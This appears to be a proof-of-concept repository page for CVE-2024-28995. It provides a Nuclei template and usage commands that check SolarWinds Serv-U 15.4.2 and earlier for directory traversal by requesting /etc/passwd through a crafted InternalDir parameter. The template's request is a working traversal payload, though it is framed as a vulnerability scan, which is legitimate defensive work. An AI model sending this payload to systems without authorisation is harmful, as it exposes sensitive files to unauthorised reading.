CVE-2024-28995 PoC — SolarWinds Serv-U 路径遍历漏洞

Source

Associated Vulnerability

Readme

# CVE-2024-28995 Nuclei Template

Checks for directory traversal vulnerability in Serv-U versions 15.4.2 and below, which allows reading sensitive files like /etc/passwd.

## Template Details

```yaml
id: CVE-2024-28995

info:
  name: Serv-U Directory Traversal Vulnerability
  author: Hüseyin TINTAŞ
  severity: high
  description: Checks for directory traversal vulnerability in Serv-U versions 15.4.2 and below, which allows reading sensitive files like /etc/passwd.
  reference:
    - https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
  tags: pathtraversal,cve,high,serv-u

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?InternalDir=\\..\\..\\..\\..\\etc^&InternalFile=passwd"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "root:x:"
          - "daemon:x:"
          - "bin:x:"
        part: body

      - type: status
        status:
          - 200

      - type: word
        words:
          - "Server: Serv-U"
        part: header



```

## Usage

To use this template with Nuclei, save the template content into a file named `CVE-2024-28995.yaml` and run the following command:

```bash
nuclei -t CVE-2024-28995.yaml -u <target-url>
```
Replace `<target-url>` with the URL of the target you want to scan.

## Contact

For any inquiries or further information, you can reach out to me through:

- [LinkedIn](https://www.linkedin.com/in/huseyintintas/)
- [Twitter](https://twitter.com/1337stif)

File Snapshot

 [4.0K]  /data/pocs/08d3b42b4fb9b647993946dc2915baf9b0b064a9
├── [ 817]  CVE-2024-28995.yaml
└── [1.4K]  README.md

0 directories, 2 files

Remarks